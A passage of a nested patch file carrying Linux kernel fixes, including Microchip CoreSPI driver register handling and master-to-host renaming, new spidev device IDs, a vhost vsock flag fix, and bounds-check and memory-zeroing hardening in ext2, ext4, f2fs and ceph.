++	}
+ 
+ 	/*
+ 	 * The lower 16 bits of the frame count are stored in the control reg
+ 	 * for legacy reasons, but the upper 16 written to a different register:
+ 	 * FRAMESUP. While both the upper and lower bits can be *READ* from the
+-	 * FRAMESUP register, writing to the lower 16 bits is a NOP
++	 * FRAMESUP register, writing to the lower 16 bits is (supposedly) a NOP.
++	 *
++	 * The driver used to disable the controller while modifying the frame
++	 * count, and mask off the lower 16 bits of len while writing to
++	 * FRAMES_UP. When the driver was changed to disable the controller as
++	 * infrequently as possible, it was discovered that the logic of
++	 * lenpart = len & 0xffff_0000
++	 * write(REG_FRAMESUP, lenpart)
++	 * would actually write zeros into the lower 16 bits on an mpfs250t-es,
++	 * despite documentation stating these bits were read-only.
++	 * Writing len unmasked into FRAMES_UP ensures those bits aren't zeroed
++	 * on an mpfs250t-es and will be a NOP for the lower 16 bits on hardware
++	 * that matches the documentation.
+ 	 */
+ 	lenpart = len & 0xffff;
+-
+ 	control = mchp_corespi_read(spi, REG_CONTROL);
+ 	control &= ~CONTROL_FRAMECNT_MASK;
+ 	control |= lenpart << CONTROL_FRAMECNT_SHIFT;
+ 	mchp_corespi_write(spi, REG_CONTROL, control);
+-
+-	lenpart = len & 0xffff0000;
+-	mchp_corespi_write(spi, REG_FRAMESUP, lenpart);
+-
+-	control |= CONTROL_ENABLE;
+-	mchp_corespi_write(spi, REG_CONTROL, control);
++	mchp_corespi_write(spi, REG_FRAMESUP, len);
+ }
+ 
+ static inline void mchp_corespi_write_fifo(struct mchp_corespi *spi)
+@@ -235,17 +234,22 @@ static inline void mchp_corespi_write_fifo(struct mchp_corespi *spi)
+ 
+ static inline void mchp_corespi_set_framesize(struct mchp_corespi *spi, int bt)
+ {
++	u32 frame_size = mchp_corespi_read(spi, REG_FRAME_SIZE);
+ 	u32 control;
+ 
++	if ((frame_size & FRAME_SIZE_MASK) == bt)
++		return;
++
+ 	/*
+ 	 * Disable the SPI controller. Writes to the frame size have
+ 	 * no effect when the controller is enabled.
+ 	 */
+-	mchp_corespi_disable(spi);
++	control = mchp_corespi_read(spi, REG_CONTROL);
++	control &= ~CONTROL_ENABLE;
++	mchp_corespi_write(spi, REG_CONTROL, control);
+ 
+ 	mchp_corespi_write(spi, REG_FRAME_SIZE, bt);
+ 
+-	control = mchp_corespi_read(spi, REG_CONTROL);
+ 	control |= CONTROL_ENABLE;
+ 	mchp_corespi_write(spi, REG_CONTROL, control);
+ }
+@@ -253,7 +257,7 @@ static inline void mchp_corespi_set_framesize(struct mchp_corespi *spi, int bt)
+ static void mchp_corespi_set_cs(struct spi_device *spi, bool disable)
+ {
+ 	u32 reg;
+-	struct mchp_corespi *corespi = spi_master_get_devdata(spi->master);
++	struct mchp_corespi *corespi = spi_controller_get_devdata(spi->controller);
+ 
+ 	reg = mchp_corespi_read(corespi, REG_SLAVE_SELECT);
+ 	reg &= ~BIT(spi->chip_select);
+@@ -264,11 +268,11 @@ static void mchp_corespi_set_cs(struct spi_device *spi, bool disable)
+ 
+ static int mchp_corespi_setup(struct spi_device *spi)
+ {
+-	struct mchp_corespi *corespi = spi_master_get_devdata(spi->master);
++	struct mchp_corespi *corespi = spi_controller_get_devdata(spi->controller);
+ 	u32 reg;
+ 
+ 	/*
+-	 * Active high slaves need to be specifically set to their inactive
++	 * Active high targets need to be specifically set to their inactive
+ 	 * states during probe by adding them to the "control group" & thus
+ 	 * driving their select line low.
+ 	 */
+@@ -280,22 +284,18 @@ static int mchp_corespi_setup(struct spi_device *spi)
+ 	return 0;
+ }
+ 
+-static void mchp_corespi_init(struct spi_master *master, struct mchp_corespi *spi)
++static void mchp_corespi_init(struct spi_controller *host, struct mchp_corespi *spi)
+ {
+ 	unsigned long clk_hz;
+ 	u32 control = mchp_corespi_read(spi, REG_CONTROL);
+ 
+-	control |= CONTROL_MASTER;
++	control &= ~CONTROL_ENABLE;
++	mchp_corespi_write(spi, REG_CONTROL, control);
+ 
++	control |= CONTROL_MASTER;
+ 	control &= ~CONTROL_MODE_MASK;
+ 	control |= MOTOROLA_MODE;
+ 
+-	mchp_corespi_set_framesize(spi, DEFAULT_FRAMESIZE);
+-
+-	/* max. possible spi clock rate is the apb clock rate */
+-	clk_hz = clk_get_rate(spi->clk);
+-	master->max_speed_hz = clk_hz;
+-
+ 	/*
+ 	 * The controller must be configured so that it doesn't remove Chip
+ 	 * Select until the entire message has been transferred, even if at
+@@ -304,17 +304,22 @@ static void mchp_corespi_init(struct spi_master *master, struct mchp_corespi *sp
+ 	 * BIGFIFO mode is also enabled, which sets the fifo depth to 32 frames
+ 	 * for the 8 bit transfers that this driver uses.
+ 	 */
+-	control = mchp_corespi_read(spi, REG_CONTROL);
+ 	control |= CONTROL_SPS | CONTROL_BIGFIFO;
+ 
+ 	mchp_corespi_write(spi, REG_CONTROL, control);
+ 
++	mchp_corespi_set_framesize(spi, DEFAULT_FRAMESIZE);
++
++	/* max. possible spi clock rate is the apb clock rate */
++	clk_hz = clk_get_rate(spi->clk);
++	host->max_speed_hz = clk_hz;
++
+ 	mchp_corespi_enable_ints(spi);
+ 
+ 	/*
+ 	 * It is required to enable direct mode, otherwise control over the chip
+ 	 * select is relinquished to the hardware. SSELOUT is enabled too so we
+-	 * can deal with active high slaves.
++	 * can deal with active high targets.
+ 	 */
+ 	mchp_corespi_write(spi, REG_SLAVE_SELECT, SSELOUT | SSEL_DIRECT);
+ 
+@@ -330,8 +335,6 @@ static inline void mchp_corespi_set_clk_gen(struct mchp_corespi *spi)
+ {
+ 	u32 control;
+ 
+-	mchp_corespi_disable(spi);
+-
+ 	control = mchp_corespi_read(spi, REG_CONTROL);
+ 	if (spi->clk_mode)
+ 		control |= CONTROL_CLKMODE;
+@@ -340,12 +343,12 @@ static inline void mchp_corespi_set_clk_gen(struct mchp_corespi *spi)
+ 
+ 	mchp_corespi_write(spi, REG_CLK_GEN, spi->clk_gen);
+ 	mchp_corespi_write(spi, REG_CONTROL, control);
+-	mchp_corespi_write(spi, REG_CONTROL, control | CONTROL_ENABLE);
+ }
+ 
+ static inline void mchp_corespi_set_mode(struct mchp_corespi *spi, unsigned int mode)
+ {
+-	u32 control, mode_val;
++	u32 mode_val;
++	u32 control = mchp_corespi_read(spi, REG_CONTROL);
+ 
+ 	switch (mode & SPI_MODE_X_MASK) {
+ 	case SPI_MODE_0:
+@@ -363,12 +366,13 @@ static inline void mchp_corespi_set_mode(struct mchp_corespi *spi, unsigned int
+ 	}
+ 
+ 	/*
+-	 * Disable the SPI controller. Writes to the frame size have
++	 * Disable the SPI controller. Writes to the frame protocol have
+ 	 * no effect when the controller is enabled.
+ 	 */
+-	mchp_corespi_disable(spi);
+ 
+-	control = mchp_corespi_read(spi, REG_CONTROL);
++	control &= ~CONTROL_ENABLE;
++	mchp_corespi_write(spi, REG_CONTROL, control);
++
+ 	control &= ~(SPI_MODE_X_MASK << MODE_X_MASK_SHIFT);
+ 	control |= mode_val;
+ 
+@@ -380,8 +384,8 @@ static inline void mchp_corespi_set_mode(struct mchp_corespi *spi, unsigned int
+ 
+ static irqreturn_t mchp_corespi_interrupt(int irq, void *dev_id)
+ {
+-	struct spi_master *master = dev_id;
+-	struct mchp_corespi *spi = spi_master_get_devdata(master);
++	struct spi_controller *host = dev_id;
++	struct mchp_corespi *spi = spi_controller_get_devdata(host);
+ 	u32 intfield = mchp_corespi_read(spi, REG_MIS) & 0xf;
+ 	bool finalise = false;
+ 
+@@ -389,26 +393,23 @@ static irqreturn_t mchp_corespi_interrupt(int irq, void *dev_id)
+ 	if (intfield == 0)
+ 		return IRQ_NONE;
+ 
+-	if (intfield & INT_TXDONE) {
++	if (intfield & INT_TXDONE)
+ 		mchp_corespi_write(spi, REG_INT_CLEAR, INT_TXDONE);
+ 
++	if (intfield & INT_RXRDY) {
++		mchp_corespi_write(spi, REG_INT_CLEAR, INT_RXRDY);
++
+ 		if (spi->rx_len)
+ 			mchp_corespi_read_fifo(spi);
+-
+-		if (spi->tx_len)
+-			mchp_corespi_write_fifo(spi);
+-
+-		if (!spi->rx_len)
+-			finalise = true;
+ 	}
+ 
+-	if (intfield & INT_RXRDY)
+-		mchp_corespi_write(spi, REG_INT_CLEAR, INT_RXRDY);
++	if (!spi->rx_len && !spi->tx_len)
++		finalise = true;
+ 
+ 	if (intfield & INT_RX_CHANNEL_OVERFLOW) {
+ 		mchp_corespi_write(spi, REG_INT_CLEAR, INT_RX_CHANNEL_OVERFLOW);
+ 		finalise = true;
+-		dev_err(&master->dev,
++		dev_err(&host->dev,
+ 			"%s: RX OVERFLOW: rxlen: %d, txlen: %d\n", __func__,
+ 			spi->rx_len, spi->tx_len);
+ 	}
+@@ -416,13 +417,13 @@ static irqreturn_t mchp_corespi_interrupt(int irq, void *dev_id)
+ 	if (intfield & INT_TX_CHANNEL_UNDERRUN) {
+ 		mchp_corespi_write(spi, REG_INT_CLEAR, INT_TX_CHANNEL_UNDERRUN);
+ 		finalise = true;
+-		dev_err(&master->dev,
++		dev_err(&host->dev,
+ 			"%s: TX UNDERFLOW: rxlen: %d, txlen: %d\n", __func__,
+ 			spi->rx_len, spi->tx_len);
+ 	}
+ 
+ 	if (finalise)
+-		spi_finalize_current_transfer(master);
++		spi_finalize_current_transfer(host);
+ 
+ 	return IRQ_HANDLED;
+ }
+@@ -464,16 +465,16 @@ static int mchp_corespi_calculate_clkgen(struct mchp_corespi *spi,
+ 	return 0;
+ }
+ 
+-static int mchp_corespi_transfer_one(struct spi_master *master,
++static int mchp_corespi_transfer_one(struct spi_controller *host,
+ 				     struct spi_device *spi_dev,
+ 				     struct spi_transfer *xfer)
+ {
+-	struct mchp_corespi *spi = spi_master_get_devdata(master);
++	struct mchp_corespi *spi = spi_controller_get_devdata(host);
+ 	int ret;
+ 
+ 	ret = mchp_corespi_calculate_clkgen(spi, (unsigned long)xfer->speed_hz);
+ 	if (ret) {
+-		dev_err(&master->dev, "failed to set clk_gen for target %u Hz\n", xfer->speed_hz);
++		dev_err(&host->dev, "failed to set clk_gen for target %u Hz\n", xfer->speed_hz);
+ 		return ret;
+ 	}
+ 
+@@ -488,16 +489,17 @@ static int mchp_corespi_transfer_one(struct spi_master *master,
+ 	mchp_corespi_set_xfer_size(spi, (spi->tx_len > FIFO_DEPTH)
+ 				   ? FIFO_DEPTH : spi->tx_len);
+ 
+-	if (spi->tx_len)
++	while (spi->tx_len)
+ 		mchp_corespi_write_fifo(spi);
++
+ 	return 1;
+ }
+ 
+-static int mchp_corespi_prepare_message(struct spi_master *master,
++static int mchp_corespi_prepare_message(struct spi_controller *host,
+ 					struct spi_message *msg)
+ {
+ 	struct spi_device *spi_dev = msg->spi;
+-	struct mchp_corespi *spi = spi_master_get_devdata(master);
++	struct mchp_corespi *spi = spi_controller_get_devdata(host);
+ 
+ 	mchp_corespi_set_framesize(spi, DEFAULT_FRAMESIZE);
+ 	mchp_corespi_set_mode(spi, spi_dev->mode);
+@@ -507,32 +509,32 @@ static int mchp_corespi_prepare_message(struct spi_master *master,
+ 
+ static int mchp_corespi_probe(struct platform_device *pdev)
+ {
+-	struct spi_master *master;
++	struct spi_controller *host;
+ 	struct mchp_corespi *spi;
+ 	struct resource *res;
+ 	u32 num_cs;
+ 	int ret = 0;
+ 
+-	master = devm_spi_alloc_master(&pdev->dev, sizeof(*spi));
+-	if (!master)
++	host = devm_spi_alloc_host(&pdev->dev, sizeof(*spi));
++	if (!host)
+ 		return dev_err_probe(&pdev->dev, -ENOMEM,
+-				     "unable to allocate master for SPI controller\n");
++				     "unable to allocate host for SPI controller\n");
+ 
+-	platform_set_drvdata(pdev, master);
++	platform_set_drvdata(pdev, host);
+ 
+ 	if (of_property_read_u32(pdev->dev.of_node, "num-cs", &num_cs))
+ 		num_cs = MAX_CS;
+ 
+-	master->num_chipselect = num_cs;
+-	master->mode_bits = SPI_CPOL | SPI_CPHA | SPI_CS_HIGH;
+-	master->setup = mchp_corespi_setup;
+-	master->bits_per_word_mask = SPI_BPW_MASK(8);
+-	master->transfer_one = mchp_corespi_transfer_one;
+-	master->prepare_message = mchp_corespi_prepare_message;
+-	master->set_cs = mchp_corespi_set_cs;
+-	master->dev.of_node = pdev->dev.of_node;
++	host->num_chipselect = num_cs;
++	host->mode_bits = SPI_CPOL | SPI_CPHA | SPI_CS_HIGH;
++	host->setup = mchp_corespi_setup;
++	host->bits_per_word_mask = SPI_BPW_MASK(8);
++	host->transfer_one = mchp_corespi_transfer_one;
++	host->prepare_message = mchp_corespi_prepare_message;
++	host->set_cs = mchp_corespi_set_cs;
++	host->dev.of_node = pdev->dev.of_node;
+ 
+-	spi = spi_master_get_devdata(master);
++	spi = spi_controller_get_devdata(host);
+ 
+ 	spi->regs = devm_platform_get_and_ioremap_resource(pdev, 0, &res);
+ 	if (IS_ERR(spi->regs))
+@@ -545,7 +547,7 @@ static int mchp_corespi_probe(struct platform_device *pdev)
+ 				     spi->irq);
+ 
+ 	ret = devm_request_irq(&pdev->dev, spi->irq, mchp_corespi_interrupt,
+-			       IRQF_SHARED, dev_name(&pdev->dev), master);
++			       IRQF_SHARED, dev_name(&pdev->dev), host);
+ 	if (ret)
+ 		return dev_err_probe(&pdev->dev, ret,
+ 				     "could not request irq\n");
+@@ -560,25 +562,25 @@ static int mchp_corespi_probe(struct platform_device *pdev)
+ 		return dev_err_probe(&pdev->dev, ret,
+ 				     "failed to enable clock\n");
+ 
+-	mchp_corespi_init(master, spi);
++	mchp_corespi_init(host, spi);
+ 
+-	ret = devm_spi_register_master(&pdev->dev, master);
++	ret = devm_spi_register_controller(&pdev->dev, host);
+ 	if (ret) {
+ 		mchp_corespi_disable(spi);
+ 		clk_disable_unprepare(spi->clk);
+ 		return dev_err_probe(&pdev->dev, ret,
+-				     "unable to register master for SPI controller\n");
++				     "unable to register host for SPI controller\n");
+ 	}
+ 
+-	dev_info(&pdev->dev, "Registered SPI controller %d\n", master->bus_num);
++	dev_info(&pdev->dev, "Registered SPI controller %d\n", host->bus_num);
+ 
+ 	return 0;
+ }
+ 
+ static int mchp_corespi_remove(struct platform_device *pdev)
+ {
+-	struct spi_master *master  = platform_get_drvdata(pdev);
+-	struct mchp_corespi *spi = spi_master_get_devdata(master);
++	struct spi_controller *host  = platform_get_drvdata(pdev);
++	struct mchp_corespi *spi = spi_controller_get_devdata(host);
+ 
+ 	mchp_corespi_disable_ints(spi);
+ 	clk_disable_unprepare(spi->clk);
+diff --git a/drivers/spi/spidev.c b/drivers/spi/spidev.c
+index 71c3db60e9687..00612efc2277f 100644
+--- a/drivers/spi/spidev.c
++++ b/drivers/spi/spidev.c
+@@ -700,6 +700,7 @@ static const struct spi_device_id spidev_spi_ids[] = {
+ 	{ .name = "m53cpld" },
+ 	{ .name = "spi-petra" },
+ 	{ .name = "spi-authenta" },
++	{ .name = "em3581" },
+ 	{},
+ };
+ MODULE_DEVICE_TABLE(spi, spidev_spi_ids);
+@@ -718,14 +719,16 @@ static int spidev_of_check(struct device *dev)
+ }
+ 
+ static const struct of_device_id spidev_dt_ids[] = {
+-	{ .compatible = "rohm,dh2228fv", .data = &spidev_of_check },
++	{ .compatible = "cisco,spi-petra", .data = &spidev_of_check },
++	{ .compatible = "dh,dhcom-board", .data = &spidev_of_check },
+ 	{ .compatible = "lineartechnology,ltc2488", .data = &spidev_of_check },
+-	{ .compatible = "semtech,sx1301", .data = &spidev_of_check },
+ 	{ .compatible = "lwn,bk4", .data = &spidev_of_check },
+-	{ .compatible = "dh,dhcom-board", .data = &spidev_of_check },
+ 	{ .compatible = "menlo,m53cpld", .data = &spidev_of_check },
+-	{ .compatible = "cisco,spi-petra", .data = &spidev_of_check },
+ 	{ .compatible = "micron,spi-authenta", .data = &spidev_of_check },
++	{ .compatible = "rohm,bh2228fv", .data = &spidev_of_check },
++	{ .compatible = "rohm,dh2228fv", .data = &spidev_of_check },
++	{ .compatible = "semtech,sx1301", .data = &spidev_of_check },
++	{ .compatible = "silabs,em3581", .data = &spidev_of_check },
+ 	{},
+ };
+ MODULE_DEVICE_TABLE(of, spidev_dt_ids);
+diff --git a/drivers/vhost/vsock.c b/drivers/vhost/vsock.c
+index 1f3b89c885cca..c00f5821d6ecb 100644
+--- a/drivers/vhost/vsock.c
++++ b/drivers/vhost/vsock.c
+@@ -654,6 +654,7 @@ static int vhost_vsock_dev_open(struct inode *inode, struct file *file)
+ 	}
+ 
+ 	vsock->guest_cid = 0; /* no CID assigned yet */
++	vsock->seqpacket_allow = false;
+ 
+ 	atomic_set(&vsock->queued_replies, 0);
+ 
+@@ -797,8 +798,7 @@ static int vhost_vsock_set_features(struct vhost_vsock *vsock, u64 features)
+ 			goto err;
+ 	}
+ 
+-	if (features & (1ULL << VIRTIO_VSOCK_F_SEQPACKET))
+-		vsock->seqpacket_allow = true;
++	vsock->seqpacket_allow = features & (1ULL << VIRTIO_VSOCK_F_SEQPACKET);
+ 
+ 	for (i = 0; i < ARRAY_SIZE(vsock->vqs); i++) {
+ 		vq = &vsock->vqs[i];
+diff --git a/drivers/watchdog/rzg2l_wdt.c b/drivers/watchdog/rzg2l_wdt.c
+index d404953d0e0f4..9b2698a4fc1a1 100644
+--- a/drivers/watchdog/rzg2l_wdt.c
++++ b/drivers/watchdog/rzg2l_wdt.c
+@@ -123,8 +123,11 @@ static void rzg2l_wdt_init_timeout(struct watchdog_device *wdev)
+ static int rzg2l_wdt_start(struct watchdog_device *wdev)
+ {
+ 	struct rzg2l_wdt_priv *priv = watchdog_get_drvdata(wdev);
++	int ret;
+ 
+-	pm_runtime_get_sync(wdev->parent);
++	ret = pm_runtime_resume_and_get(wdev->parent);
++	if (ret)
++		return ret;
+ 
+ 	/* Initialize time out */
+ 	rzg2l_wdt_init_timeout(wdev);
+@@ -141,15 +144,21 @@ static int rzg2l_wdt_start(struct watchdog_device *wdev)
+ static int rzg2l_wdt_stop(struct watchdog_device *wdev)
+ {
+ 	struct rzg2l_wdt_priv *priv = watchdog_get_drvdata(wdev);
++	int ret;
+ 
+ 	rzg2l_wdt_reset(priv);
+-	pm_runtime_put(wdev->parent);
++
++	ret = pm_runtime_put(wdev->parent);
++	if (ret < 0)
++		return ret;
+ 
+ 	return 0;
+ }
+ 
+ static int rzg2l_wdt_set_timeout(struct watchdog_device *wdev, unsigned int timeout)
+ {
++	int ret = 0;
++
+ 	wdev->timeout = timeout;
+ 
+ 	/*
+@@ -158,11 +167,14 @@ static int rzg2l_wdt_set_timeout(struct watchdog_device *wdev, unsigned int time
+ 	 * to reset the module) so that it is updated with new timeout values.
+ 	 */
+ 	if (watchdog_active(wdev)) {
+-		rzg2l_wdt_stop(wdev);
+-		rzg2l_wdt_start(wdev);
++		ret = rzg2l_wdt_stop(wdev);
++		if (ret)
++			return ret;
++
++		ret = rzg2l_wdt_start(wdev);
+ 	}
+ 
+-	return 0;
++	return ret;
+ }
+ 
+ static int rzg2l_wdt_restart(struct watchdog_device *wdev,
+diff --git a/fs/ceph/super.c b/fs/ceph/super.c
+index 281b493fdac8e..aa75aa796e434 100644
+--- a/fs/ceph/super.c
++++ b/fs/ceph/super.c
+@@ -924,7 +924,8 @@ static int __init init_caches(void)
+ 	if (!ceph_mds_request_cachep)
+ 		goto bad_mds_req;
+ 
+-	ceph_wb_pagevec_pool = mempool_create_kmalloc_pool(10, CEPH_MAX_WRITE_SIZE >> PAGE_SHIFT);
++	ceph_wb_pagevec_pool = mempool_create_kmalloc_pool(10,
++	    (CEPH_MAX_WRITE_SIZE >> PAGE_SHIFT) * sizeof(struct page *));
+ 	if (!ceph_wb_pagevec_pool)
+ 		goto bad_pagevec_pool;
+ 
+diff --git a/fs/ext2/balloc.c b/fs/ext2/balloc.c
+index 5dc0a31f4a087..d2eb4d291985e 100644
+--- a/fs/ext2/balloc.c
++++ b/fs/ext2/balloc.c
+@@ -79,26 +79,33 @@ static int ext2_valid_block_bitmap(struct super_block *sb,
+ 	ext2_grpblk_t next_zero_bit;
+ 	ext2_fsblk_t bitmap_blk;
+ 	ext2_fsblk_t group_first_block;
++	ext2_grpblk_t max_bit;
+ 
+ 	group_first_block = ext2_group_first_block_no(sb, block_group);
++	max_bit = ext2_group_last_block_no(sb, block_group) - group_first_block;
+ 
+ 	/* check whether block bitmap block number is set */
+ 	bitmap_blk = le32_to_cpu(desc->bg_block_bitmap);
+ 	offset = bitmap_blk - group_first_block;
+-	if (!ext2_test_bit(offset, bh->b_data))
++	if (offset < 0 || offset > max_bit ||
++	    !ext2_test_bit(offset, bh->b_data))
+ 		/* bad block bitmap */
+ 		goto err_out;
+ 
+ 	/* check whether the inode bitmap block number is set */
+ 	bitmap_blk = le32_to_cpu(desc->bg_inode_bitmap);
+ 	offset = bitmap_blk - group_first_block;
+-	if (!ext2_test_bit(offset, bh->b_data))
++	if (offset < 0 || offset > max_bit ||
++	    !ext2_test_bit(offset, bh->b_data))
+ 		/* bad block bitmap */
+ 		goto err_out;
+ 
+ 	/* check whether the inode table block number is set */
+ 	bitmap_blk = le32_to_cpu(desc->bg_inode_table);
+ 	offset = bitmap_blk - group_first_block;
++	if (offset < 0 || offset > max_bit ||
++	    offset + EXT2_SB(sb)->s_itb_per_group - 1 > max_bit)
++		goto err_out;
+ 	next_zero_bit = ext2_find_next_zero_bit(bh->b_data,
+ 				offset + EXT2_SB(sb)->s_itb_per_group,
+ 				offset);
+diff --git a/fs/ext4/extents_status.c b/fs/ext4/extents_status.c
+index 470d29fb407a5..9766d3b21ca2e 100644
+--- a/fs/ext4/extents_status.c
++++ b/fs/ext4/extents_status.c
+@@ -312,6 +312,8 @@ void ext4_es_find_extent_range(struct inode *inode,
+ 			       ext4_lblk_t lblk, ext4_lblk_t end,
+ 			       struct extent_status *es)
+ {
++	es->es_lblk = es->es_len = es->es_pblk = 0;
++
+ 	if (EXT4_SB(inode->i_sb)->s_mount_state & EXT4_FC_REPLAY)
+ 		return;
+ 
+diff --git a/fs/ext4/fast_commit.c b/fs/ext4/fast_commit.c
+index 1110bfa0a5b73..19353a2f44bb3 100644
+--- a/fs/ext4/fast_commit.c
++++ b/fs/ext4/fast_commit.c
+@@ -649,6 +649,12 @@ void ext4_fc_track_range(handle_t *handle, struct inode *inode, ext4_lblk_t star
+ 	if (ext4_test_mount_flag(inode->i_sb, EXT4_MF_FC_INELIGIBLE))
+ 		return;
+ 
++	if (ext4_has_inline_data(inode)) {
++		ext4_fc_mark_ineligible(inode->i_sb, EXT4_FC_REASON_XATTR,
++					handle);
++		return;
++	}
++
+ 	args.start = start;
+ 	args.end = end;
+ 
+diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
+index 8b13832238484..173f46fa10687 100644
+--- a/fs/ext4/namei.c
++++ b/fs/ext4/namei.c
+@@ -151,10 +151,11 @@ static struct buffer_head *__ext4_read_dirblock(struct inode *inode,
+ 
+ 		return bh;
+ 	}
+-	if (!bh && (type == INDEX || type == DIRENT_HTREE)) {
++	/* The first directory block must not be a hole. */
++	if (!bh && (type == INDEX || type == DIRENT_HTREE || block == 0)) {
+ 		ext4_error_inode(inode, func, line, block,
+-				 "Directory hole found for htree %s block",
+-				 (type == INDEX) ? "index" : "leaf");
++				 "Directory hole found for htree %s block %u",
++				 (type == INDEX) ? "index" : "leaf", block);
+ 		return ERR_PTR(-EFSCORRUPTED);
+ 	}
+ 	if (!bh)
+@@ -2218,6 +2219,52 @@ static int add_dirent_to_buf(handle_t *handle, struct ext4_filename *fname,
+ 	return err ? err : err2;
+ }
+ 
++static bool ext4_check_dx_root(struct inode *dir, struct dx_root *root)
++{
++	struct fake_dirent *fde;
++	const char *error_msg;
++	unsigned int rlen;
++	unsigned int blocksize = dir->i_sb->s_blocksize;
++	char *blockend = (char *)root + dir->i_sb->s_blocksize;
++
++	fde = &root->dot;
++	if (unlikely(fde->name_len != 1)) {
++		error_msg = "invalid name_len for '.'";
++		goto corrupted;
++	}
++	if (unlikely(strncmp(root->dot_name, ".", fde->name_len))) {
++		error_msg = "invalid name for '.'";
++		goto corrupted;
++	}
++	rlen = ext4_rec_len_from_disk(fde->rec_len, blocksize);
++	if (unlikely((char *)fde + rlen >= blockend)) {
++		error_msg = "invalid rec_len for '.'";
++		goto corrupted;
++	}
++
++	fde = &root->dotdot;
++	if (unlikely(fde->name_len != 2)) {
++		error_msg = "invalid name_len for '..'";
++		goto corrupted;
++	}
++	if (unlikely(strncmp(root->dotdot_name, "..", fde->name_len))) {
++		error_msg = "invalid name for '..'";
++		goto corrupted;
++	}
++	rlen = ext4_rec_len_from_disk(fde->rec_len, blocksize);
++	if (unlikely((char *)fde + rlen >= blockend)) {
++		error_msg = "invalid rec_len for '..'";
++		goto corrupted;
++	}
++
++	return true;
++
++corrupted:
++	EXT4_ERROR_INODE(dir, "Corrupt dir, %s, running e2fsck is recommended",
++			 error_msg);
++	return false;
++}
++
+ /*
+  * This converts a one block unindexed directory to a 3 block indexed
+  * directory, and adds the dentry to the indexed directory.
+@@ -2252,17 +2299,17 @@ static int make_indexed_dir(handle_t *handle, struct ext4_filename *fname,
+ 		brelse(bh);
+ 		return retval;
+ 	}
++
+ 	root = (struct dx_root *) bh->b_data;
++	if (!ext4_check_dx_root(dir, root)) {
++		brelse(bh);
++		return -EFSCORRUPTED;
++	}
+ 
+ 	/* The 0th block becomes the root, move the dirents out */
+ 	fde = &root->dotdot;
+ 	de = (struct ext4_dir_entry_2 *)((char *)fde +
+ 		ext4_rec_len_from_disk(fde->rec_len, blocksize));
+-	if ((char *) de >= (((char *) root) + blocksize)) {
+-		EXT4_ERROR_INODE(dir, "invalid rec_len for '..'");
+-		brelse(bh);
+-		return -EFSCORRUPTED;
+-	}
+ 	len = ((char *) root) + (blocksize - csum_size) - (char *) de;
+ 
+ 	/* Allocate new block for the 0th block's dirents */
+@@ -3087,10 +3134,7 @@ bool ext4_empty_dir(struct inode *inode)
+ 		EXT4_ERROR_INODE(inode, "invalid size");
+ 		return false;
+ 	}
+-	/* The first directory block must not be a hole,
+-	 * so treat it as DIRENT_HTREE
+-	 */
+-	bh = ext4_read_dirblock(inode, 0, DIRENT_HTREE);
++	bh = ext4_read_dirblock(inode, 0, EITHER);
+ 	if (IS_ERR(bh))
+ 		return false;
+ 
+@@ -3534,10 +3578,7 @@ static struct buffer_head *ext4_get_first_dir_block(handle_t *handle,
+ 		struct ext4_dir_entry_2 *de;
+ 		unsigned int offset;
+ 
+-		/* The first directory block must not be a hole, so
+-		 * treat it as DIRENT_HTREE
+-		 */
+-		bh = ext4_read_dirblock(inode, 0, DIRENT_HTREE);
++		bh = ext4_read_dirblock(inode, 0, EITHER);
+ 		if (IS_ERR(bh)) {
+ 			*retval = PTR_ERR(bh);
+ 			return NULL;
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index 28d00ed833db4..f0a45d3ec4ebb 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -1384,6 +1384,12 @@ static int ext4_xattr_inode_write(handle_t *handle, struct inode *ea_inode,
+ 			goto out;
+ 
+ 		memcpy(bh->b_data, buf, csize);
++		/*
++		 * Zero out block tail to avoid writing uninitialized memory
++		 * to disk.
++		 */
++		if (csize < blocksize)
++			memset(bh->b_data + csize, 0, blocksize - csize);
+ 		set_buffer_uptodate(bh);
+ 		ext4_handle_dirty_metadata(handle, ea_inode, bh);
+ 
+diff --git a/fs/f2fs/checkpoint.c b/fs/f2fs/checkpoint.c
+index 13d8774706758..ad4073cde397b 100644
+--- a/fs/f2fs/checkpoint.c
++++ b/fs/f2fs/checkpoint.c
+@@ -1178,6 +1178,11 @@ static void __prepare_cp_block(struct f2fs_sb_info *sbi)
+ 	ckpt->valid_node_count = cpu_to_le32(valid_node_count(sbi));
+ 	ckpt->valid_inode_count = cpu_to_le32(valid_inode_count(sbi));
+ 	ckpt->next_free_nid = cpu_to_le32(last_nid);
++
++	/* update user_block_counts */
++	sbi->last_valid_block_count = sbi->total_valid_block_count;
++	percpu_counter_set(&sbi->alloc_valid_block_count, 0);
++	percpu_counter_set(&sbi->rf_node_block_count, 0);
+ }
+ 
+ static bool __need_flush_quota(struct f2fs_sb_info *sbi)
+@@ -1569,11 +1574,6 @@ static int do_checkpoint(struct f2fs_sb_info *sbi, struct cp_control *cpc)
+ 		start_blk += NR_CURSEG_NODE_TYPE;
+ 	}
+ 
+-	/* update user_block_counts */
+-	sbi->last_valid_block_count = sbi->total_valid_block_count;
+-	percpu_counter_set(&sbi->alloc_valid_block_count, 0);
+-	percpu_counter_set(&sbi->rf_node_block_count, 0);
+-
+ 	/* Here, we have one bio having CP pack except cp pack 2 page */
+ 	f2fs_sync_meta_pages(sbi, META, LONG_MAX, FS_CP_META_IO);
+ 	/* Wait for all dirty meta pages to be submitted for IO */
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index 1d73582d1f63d..c6fb179f9d4af 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -812,6 +812,8 @@ static bool f2fs_force_buffered_io(struct inode *inode, int rw)
+ 		return true;
+ 	if (f2fs_compressed_file(inode))
+ 		return true;
++	if (f2fs_has_inline_data(inode))
++		return true;
+ 
+ 	/* disallow direct IO if any of devices has unaligned blksize */
+ 	if (f2fs_is_multi_device(sbi) && !sbi->aligned_blksize)
+diff --git a/fs/f2fs/inline.c b/fs/f2fs/inline.c
+index 8747eec3d0a34..7a2fb9789e5ee 100644
+--- a/fs/f2fs/inline.c
++++ b/fs/f2fs/inline.c
+@@ -204,8 +204,10 @@ int f2fs_convert_inline_inode(struct inode *inode)
+ 	struct page *ipage, *page;
+ 	int err = 0;
+ 
+-	if (!f2fs_has_inline_data(inode) ||
+-			f2fs_hw_is_readonly(sbi) || f2fs_readonly(sbi->sb))
